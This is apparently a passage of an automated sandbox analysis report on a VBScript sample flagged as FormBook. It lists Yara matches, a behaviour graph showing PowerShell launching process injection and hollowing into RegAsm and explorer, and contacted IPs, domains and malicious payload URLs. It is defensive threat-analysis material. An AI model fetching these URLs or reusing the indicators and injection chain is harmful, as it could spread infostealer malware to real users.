Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635407 Sample: daveCrpted.vbs Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 71 www.nancykmorrison.store 2->71 73 www.hibikaiteki.com 2->73 85 Snort IDS alert for network traffic 2->85 87 Multi AV Scanner detection for domain / URL 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 5 other signatures 2->91 15 wscript.exe 1 2->15         started        signatures3 process4 signatures5 125 Suspicious powershell command line found 15->125 127 Wscript starts Powershell (via cmd or directly) 15->127 18 powershell.exe 9 15->18         started        process6 signatures7 83 Suspicious powershell command line found 18->83 21 powershell.exe 14 17 18->21         started        25 conhost.exe 18->25         started        process8 dnsIp9 75 20.106.232.4, 49738, 49778, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 21->75 77 2.56.57.22, 49739, 49780, 80 GBTCLOUDUS Netherlands 21->77 93 Suspicious powershell command line found 21->93 95 Writes to foreign memory regions 21->95 97 Injects a PE file into a foreign processes 21->97 27 RegAsm.exe 21->27         started        30 powershell.exe 14 21->30         started        signatures10 process11 file12 109 Modifies the context of a thread in another process (thread injection) 27->109 111 Maps a DLL or memory area into another process 27->111 113 Sample uses process hollowing technique 27->113 115 2 other signatures 27->115 33 explorer.exe 27->33 injected 69 C:\ProgramData\Done.vbs, Little-endian 30->69 dropped 36 conhost.exe 30->36         started        signatures13 process14 signatures15 81 Suspicious powershell command line found 33->81 38 powershell.exe 3 14 33->38         started        41 cmmon32.exe 33->41         started        process16 signatures17 99 Suspicious powershell command line found 38->99 43 wscript.exe 1 38->43         started        47 powershell.exe 14 38->47         started        49 conhost.exe 1 38->49         started        101 Modifies the context of a thread in another process (thread injection) 41->101 103 Maps a DLL or memory area into another process 41->103 105 Tries to detect virtualization through RDTSC time measurements 41->105 51 cmd.exe 1 41->51         started        53 explorer.exe 2 160 41->53         started        55 explorer.exe 41->55         started        process18 dnsIp19 79 192.168.2.1 unknown unknown 43->79 117 Suspicious powershell command line found 43->117 119 Wscript starts Powershell (via cmd or directly) 43->119 57 powershell.exe 43->57         started        60 conhost.exe 51->60         started        signatures20 process21 signatures22 107 Suspicious powershell command line found 57->107 62 powershell.exe 57->62         started        65 conhost.exe 57->65         started        process23 signatures24 121 Writes to foreign memory regions 62->121 123 Injects a PE file into a foreign processes 62->123 67 RegAsm.exe 62->67         started        process25
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
2.56.57.22
 unknown Netherlands
395800 GBTCLOUDUS false
20.106.232.4
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
www.hibikaiteki.com 118.27.122.216 true
www.nancykmorrison.store 172.67.160.125 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://2.56.57.22/tsdfguhijk.txt true
  • Avira URL Cloud: safe
 unknown
http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf true
  • Avira URL Cloud: malware
 unknown
http://20.106.232.4/dll/26-05-2022-StartUp.pdf true
  • Avira URL Cloud: malware
 unknown